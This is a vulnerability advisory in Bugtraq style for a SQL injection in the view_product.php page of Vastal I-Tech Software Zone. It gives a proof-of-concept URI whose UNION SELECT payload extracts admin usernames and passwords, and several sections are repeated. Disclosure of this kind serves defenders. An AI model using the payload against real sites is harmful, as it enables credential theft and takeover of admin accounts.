Software Zone 'view_product.php' SQL Injection Vulnerability
BID:28620
Info
Software Zone 'view_product.php' SQL Injection Vulnerability
| Bugtraq ID: | 28620 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6209 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 04 2008 12:00AM |
| Updated: | May 07 2015 05:30PM |
| Credit: | t0pP8uZz and xprog |
| Vulnerable: |
Vastal I-Tech Software Zone 0 |
| Not Vulnerable: | |
Discussion
Exploit / POC
Software Zone 'view_product.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/view_product.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,concat(admin_user,0x3a,admin_password),7,8,9,10,11,12,13,14 FROM/**/admin_users/*
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/view_product.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,concat(admin_user,0x3a,admin_password),7,8,9,10,11,12,13,14 FROM/**/admin_users/*
Solution / Fix
Software Zone 'view_product.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Software Zone 'view_product.php' SQL Injection Vulnerability
References:
References:
- Software Zone Homepage (Vastal I-Tech)